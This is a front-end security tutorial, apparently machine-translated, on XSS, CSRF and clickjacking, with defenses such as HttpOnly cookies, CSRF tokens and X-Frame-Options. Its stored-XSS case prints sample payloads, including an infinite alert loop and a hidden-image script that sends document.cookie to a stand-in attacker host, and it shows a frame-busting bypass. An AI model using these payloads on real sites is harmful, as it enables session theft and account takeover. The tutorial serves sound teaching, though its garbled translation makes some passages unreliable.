Front-end security knowledge - about CSRF attacks and XSS attacks
XSS
xss: XSS (Cross Site Scripting) is the most common and basic method of attack WEB site, the attacker by injecting illegal html tag or javascript code, so that when users browse the web, control the user's browser.
xss divided into three categories:
DOM xss :
That DOM Document Object Model, DOM generally represent objects in html, xhtml and xml, use the DOM may allow the content, structure and style of programs and scripts to dynamically access and update the document. It requires no server parses the response of direct participation, trigger XSS DOM parsing relies on the browser side, it can be considered a client matter entirely.
Reflective xss:
Reflective XSS also known as non-persistent XSS, is an XSS vulnerability is now most likely to occur. A request is made, XSS code appears in the URL, enter the last submitted to the server, the server parses this XSS code appears in the content of the response, the browser parses the last execution.
Storage type xss:
Storage-type XSS also known as persistent XSS, it is the most dangerous kind of cross-site scripting, compared reflective XSS and DOM XSS type has a higher hidden, so more dangerous, because it does not require the user to manually trigger . Allows users to store data in web applications may exist storage type XSS vulnerabilities, an attacker submits a period when the XSS code is received and stored on the server side, when all the surfers visit a page will be XSS, one of the most typical example is message board.
Cross-site scripting attacks can cause the following effects:
-
Defraud using false personal information input form.
-
Cookie value using the script to steal user, the victim unknowingly help the attacker to send malicious requests.
-
Show fake articles or pictures.
Storage type xss Case
In the project development, the comment is a common feature, if the content of the comments directly saved to the database, then the time display can be attacked.
If you just want to try xss, it can be:
<fontsize="100"color="red">试试水font>
If a little malicious, it can be:
<script>
while (true) {
alert('Hello')
}
script>
At this time, the site hung up.
Of course, the most common xss attacks are read Cookie:
<script>
alert(document.cookie)
script>
Cookie sent to the attacker's site:
var img =document.createElement('img')
img.src='http://www.xss.com?cookie=' +document.cookie
img.style.display='none'
document.getElementsByTagName('body')[0].appendChild(img)
The current user's login credentials are stored in the server's session, while the browser is stored in the form of a cookie. If an attacker can get the user's login credentials Cookie, even bypassing the login process, the Cookie value set directly to access the user's account.
defense
It stands to reason, as long as there is local input data, it is possible XSS hazard.
httpOnly: in the cookie after setting HttpOnly attribute, js script will not be able to read the cookie information.
// koa
ctx.cookies.set(name,value, {
httpOnly:true// 默认为 true
})
`
filter
Enter the inspection, generally used for checking the input format, for example: email, phone number, user name, password, and so on ......, in accordance with the provisions of the input format.
Not just in charge of the front, the rear end also do the same checks and filters.
Because the attacker can bypass the normal entry process, directly related settings interface to send to the server.
In some cases the HtmlEncode, user data can not be strict filtering, the label needs to be converted
When the user input, the final result is saved
<Script> window.location.href = "http://www.baidu.com" </ script>, at the time of presentation, the browser will these characters into the text, rather than a piece of code that can be executed.
JavaScriptEncode following characters with a backslash
CSRF
csrf: cross-site request forgery (Cross-Site Request Forgeries), also called one-click attack or session riding. Impersonate the user initiates a request (without the user's knowledge), the completion of some things contrary to the wishes of the user (such as modify user information, delete the beginning of comments, etc.).
May cause the following effects:
-
Using the updated setting information authenticated user rights;
-
The use of purchased goods certified user rights;
-
The use of user rights has been adopted to comment on the message board.
Photo understand the principles:
In short: too much to believe that the site user.
And xss difference
Typically CSRF is achieved by XSS, CSRF sometimes also referred XSRF (CSRF embodiment may also be achieved directly through the command line initiating request, etc.).
Essentially, XSS is a code injection problem, CSRF problem is HTTP. XSS is no content filtering cause the browser to the attacker's input when the code is executed. CSRF is because the browser automatically sends an HTTP request to bring in the cookie time, but the general session cookie sites are present inside.
From a chestnut is almost certain:
defense
-
Verification code; Forcing the user to interact with an application in order to complete the final request. This can be a good deterrent csrf, but the user experience is poor.
-
Try to use the post, get use restrictions; on a visible example, get used to do csrf too easy to attack, but the post is also not foolproof, attackers only need to construct a form on it.
-
Referer check; restriction request source, this method is the lowest cost, but can not guarantee 100% effective, because the server is not a time to be able to take Referer, and there is a risk of forgery Referer lower versions of the browser.
-
token; token validation CSRF defense mechanism is recognized as the most appropriate solution.
The whole idea is as follows:
The first step: the rear end of a randomly generated token, which you save the token to the session state; the same token to the rear end of the front page;
Step two: the front end of the page to submit the request, the request data or token is added to the header information, passed along the rear end;
Verify that the back-end and front-end session came the same token, the same is legitimate, otherwise it is illegal request.
If the site XSS vulnerabilities exist when at the same time, this method is empty talk.
Clickjacking
Clickjacking: clickjacking, it refers to the use made of transparent or Connector trap, overlaid on top of the Web page. Then convince a user unknowingly, click on an attack means that connection to access the content. This behavior is also known as camouflage interface (UI Redressing).
There are probably two ways:
-
An attacker using a transparent iframe, overlaid on a page, then convince a user to operate on the page, then the user will click transparent iframe page unknowingly;
-
Attackers use a cover picture on the page, the page of the original blocking position meaning.
Case
Photo understand
The general steps
-
Hackers create a web page using the iframe contains the target site;
-
Hide the target site, so that users can not can not detect the presence of the target site;
-
Web page construction, mutagenesis user clicks the button features
-
User clicks the button unknowingly trigger command to execute malicious web page.
defense
X-FRAME-OPTIONS;
X-FRAME-OPTIONS HTTP response header is used to allow a browser to indicate whether the page <frame>, <iframe> or <object> tag in the show. Web site can use this feature to ensure that their website content is not embedded into other people's websites go, so as to avoid clickjacking attacks.
There are three values:
DENY: indicate that the page is not allowed to show in the frame, the nest is not allowed even in the pages of the same domain name.
SAMEORIGIN: indicates that the page can show the same domain name in the frame of the page.
ALLOW-FROM url: indicates that the page can be displayed in a frame in the specified source.
Configuring X-FRAME-OPTIONS:
Apache
Add the following line to 'site' configuration:
Header always append X-Frame-Options SAMEORIGIN
nginx
Add the following line to the 'http', 'server' or 'location', the configuration
add_header X-Frame-Options SAMEORIGIN;
IIS
Add the following to the Web.config configuration file
<system.webServer>
...
<httpProtocol>
<customHeaders>
<add name="X-Frame-Options" value="SAMEORIGIN" />
</customHeaders>
</httpProtocol>
...
</system.webServer>
js judgment Jump top-level window that can be easily cracked, little significance;
function locationTop(){
if (top.location != self.location) {
top.location = self.location; return false;
}
return true;
}
locationTop();
// 破解:
// 顶层窗口中放入代码
var location = document.location;
//或者
var location = "";
Reproduced in: https: //www.cnblogs.com/still1/p/11008173.html